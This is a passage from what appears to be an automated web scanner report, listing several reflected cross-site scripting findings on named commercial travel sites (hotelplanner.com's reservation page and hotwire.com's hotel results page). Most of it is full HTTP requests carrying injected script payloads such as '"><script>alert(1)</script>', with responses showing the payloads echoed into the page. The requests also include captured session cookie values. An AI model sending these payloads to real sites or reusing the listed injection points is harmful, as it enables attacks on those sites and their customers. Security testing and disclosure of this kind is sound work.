Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
uperior+Room+1+King+Bed&bedTypes=14%7CKing+Bed&bedType=14&rateDescription=Superior+Room+1+King+Bed&ValueAdds=&hrnQuoteKey=9f715d9d-c49b-4dea-841d-bf8e7f684953&roomTypeCode=200034536&rateCode=2002057128fab0"><script>alert(1)</script>f908b250ca1&cancellationPolicy=We+understand+that+sometimes+plans+fall+through.+We+do+not+charge+a+change+or+cancel+fee.+However%2C+this+property+%28Millennium+Bostonian+Hotel+Boston%29+imposes+the+following+pen
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:36:27 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="rateCode" value="2002057128fab0"><script>alert(1)</script>f908b250ca1">
...[SNIP]...
4.315. https://www.hotelplanner.com/Accept/Reserve.cfm [rateDescription parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the rateDescription request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2ea1"><script>alert(1)</script>3d05f782135 was submitted in the rateDescription parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
anteeRequired=false&rateChange=true&taxRate=205.99&propertyType=H&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed&bedTypes=14%7CKing+Bed&bedType=14&rateDescription=Superior+Room+1+King+Bedb2ea1"><script>alert(1)</script>3d05f782135&ValueAdds=&hrnQuoteKey=9f715d9d-c49b-4dea-841d-bf8e7f684953&roomTypeCode=200034536&rateCode=200205712&cancellationPolicy=We+understand+that+sometimes+plans+fall+through.+We+do+not+charge+a+change+or+
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:36:12 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="rateDescription" value="Superior Room 1 King Bedb2ea1"><script>alert(1)</script>3d05f782135">
...[SNIP]...
4.316. https://www.hotelplanner.com/Accept/Reserve.cfm [rateFrequency parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the rateFrequency request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 804fd"><script>alert(1)</script>5d1bc77c587 was submitted in the rateFrequency parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequency=B804fd"><script>alert(1)</script>5d1bc77c587&nativeRoomRate=1434.2&nativeCurrencyCode=USD&extraPersonFees=&chargeableRoomRateTaxesAndFees=205.99&chargeableRoomRateTotal=1434.2&displayRoomRate=1434.2&NativeNightlyRates=429.49%2C429.49%2C369.23&D
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:34:04 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="rateFrequency" value="B804fd"><script>alert(1)</script>5d1bc77c587">
...[SNIP]...
4.317. https://www.hotelplanner.com/Accept/Reserve.cfm [roomTypeCode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the roomTypeCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfc91"><script>alert(1)</script>d327485d86c was submitted in the roomTypeCode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
omTypeDescription=Superior+Room+1+King+Bed&bedTypes=14%7CKing+Bed&bedType=14&rateDescription=Superior+Room+1+King+Bed&ValueAdds=&hrnQuoteKey=9f715d9d-c49b-4dea-841d-bf8e7f684953&roomTypeCode=200034536dfc91"><script>alert(1)</script>d327485d86c&rateCode=200205712&cancellationPolicy=We+understand+that+sometimes+plans+fall+through.+We+do+not+charge+a+change+or+cancel+fee.+However%2C+this+property+%28Millennium+Bostonian+Hotel+Boston%29+impose
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:36:23 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="roomTypeCode" value="200034536dfc91"><script>alert(1)</script>d327485d86c">
...[SNIP]...
4.318. https://www.hotelplanner.com/Accept/Reserve.cfm [roomTypeDescription parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the roomTypeDescription request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6054a"><script>alert(1)</script>9a5b6e7cfdb was submitted in the roomTypeDescription parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
59&promoDescription=&immediateChargeRequired=true&depositRequired=true&guaranteeRequired=false&rateChange=true&taxRate=205.99&propertyType=H&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed6054a"><script>alert(1)</script>9a5b6e7cfdb&bedTypes=14%7CKing+Bed&bedType=14&rateDescription=Superior+Room+1+King+Bed&ValueAdds=&hrnQuoteKey=9f715d9d-c49b-4dea-841d-bf8e7f684953&roomTypeCode=200034536&rateCode=200205712&cancellationPolicy=We+
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:35:59 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58910

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="roomTypeDescription" value="Superior Room 1 King Bed6054a"><script>alert(1)</script>9a5b6e7cfdb">
...[SNIP]...
4.319. https://www.hotelplanner.com/Accept/Reserve.cfm [roomTypeDescription parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the roomTypeDescription request parameter is copied into the HTML document as plain text between tags. The payload 59230<script>alert(1)</script>c81ab473367 was submitted in the roomTypeDescription parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
59&promoDescription=&immediateChargeRequired=true&depositRequired=true&guaranteeRequired=false&rateChange=true&taxRate=205.99&propertyType=H&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed59230<script>alert(1)</script>c81ab473367&bedTypes=14%7CKing+Bed&bedType=14&rateDescription=Superior+Room+1+King+Bed&ValueAdds=&hrnQuoteKey=9f715d9d-c49b-4dea-841d-bf8e7f684953&roomTypeCode=200034536&rateCode=200205712&cancellationPolicy=We+
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:36:00 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58906

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<td colspan="2" class="Default" align="top">
                           Superior Room 1 King Bed59230<script>alert(1)</script>c81ab473367<br>
...[SNIP]...
4.320. https://www.hotelplanner.com/Accept/Reserve.cfm [supplierType parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the supplierType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5b26"><script>alert(1)</script>f30d5227f91 was submitted in the supplierType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
layCurrencyCode=USD&promoType=&propertyID=15159&promoDescription=&immediateChargeRequired=true&depositRequired=true&guaranteeRequired=false&rateChange=true&taxRate=205.99&propertyType=H&supplierType=Hc5b26"><script>alert(1)</script>f30d5227f91&roomTypeDescription=Superior+Room+1+King+Bed&bedTypes=14%7CKing+Bed&bedType=14&rateDescription=Superior+Room+1+King+Bed&ValueAdds=&hrnQuoteKey=9f715d9d-c49b-4dea-841d-bf8e7f684953&roomTypeCode=200034
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:35:55 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58769

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="supplierType" value="Hc5b26"><script>alert(1)</script>f30d5227f91">
...[SNIP]...
4.321. https://www.hotelplanner.com/Accept/Reserve.cfm [taxRate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the taxRate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8125b"><script>alert(1)</script>ab3b4aef7b8 was submitted in the taxRate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
=429.49%2C429.49%2C369.23&displayCurrencyCode=USD&promoType=&propertyID=15159&promoDescription=&immediateChargeRequired=true&depositRequired=true&guaranteeRequired=false&rateChange=true&taxRate=205.998125b"><script>alert(1)</script>ab3b4aef7b8&propertyType=H&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed&bedTypes=14%7CKing+Bed&bedType=14&rateDescription=Superior+Room+1+King+Bed&ValueAdds=&hrnQuoteKey=9f715d9d-c49b-4dea-841d-bf
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:35:48 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="taxRate" value="205.998125b"><script>alert(1)</script>ab3b4aef7b8">
...[SNIP]...
4.322. http://www.hotwire.com/hotel/results.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotwire.com
Path:   /hotel/results.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4bac"-alert(1)-"6cd1c47228b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotele4bac"-alert(1)-"6cd1c47228b/results.jsp?actionType=999&isAjaxRequest=true&pageDef=tiles-def.hotel.results&rerender=results&rerender=tabs_resultTabsTile&rerender=A1&rerender=A3&rerender=A5&rerender=B1&rerender=B2&rerender=B4&rerender=B5&rerender=shoppingtools&rerender=disclaimerText HTTP/1.1
Host: www.hotwire.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/results.jsp?searchTokenId=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
